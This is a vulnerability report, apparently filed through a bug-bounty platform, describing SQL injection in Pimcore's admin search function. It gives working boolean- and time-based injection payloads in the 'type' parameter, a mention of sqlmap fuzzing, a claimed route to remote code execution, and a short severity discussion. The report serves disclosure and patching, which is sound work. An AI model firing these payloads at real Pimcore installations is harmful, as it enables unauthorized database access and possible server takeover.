SQL injection search function in pimcore/pimcore
Reported on
Feb 24th 2023
Description
Please enter a description of the vulnerability.
Link POC: https://drive.google.com/drive/folders/1oFZPVrJ7lID7tDArO8spsMy1VYr_4oOb?usp=sharing
Proof of Concept
Step 1: login https://demo.pimcore.fun/admin/ Step 2: user search function and intercept request with burp Step 3: Exploit time Payload to get the length banner of DB
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+length(@@version))=39+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
Payload Check time base
time sleep 5
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(5)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
time sleep 0
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(0)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
FUZZ with sqlmap
Impact
Attacker can get full DB and maybe RCE knowing the WEBROOT path. In this case I know WEBROOT so I can RCE through the article (https://viblo.asia/p/efiens-ctf-2019-write-up-tu-sql-injection-toi-rce-va-get- root-oOVlYom4K8W)
Updated the severity to Medium as you still needs to be authenticated to call this action and limited the users with permissions to the admin.
Hi, I need you to clarify where admin rights are needed to exploit. The system can decentralize users, so I think only users with search permission can exploit this vulnerability.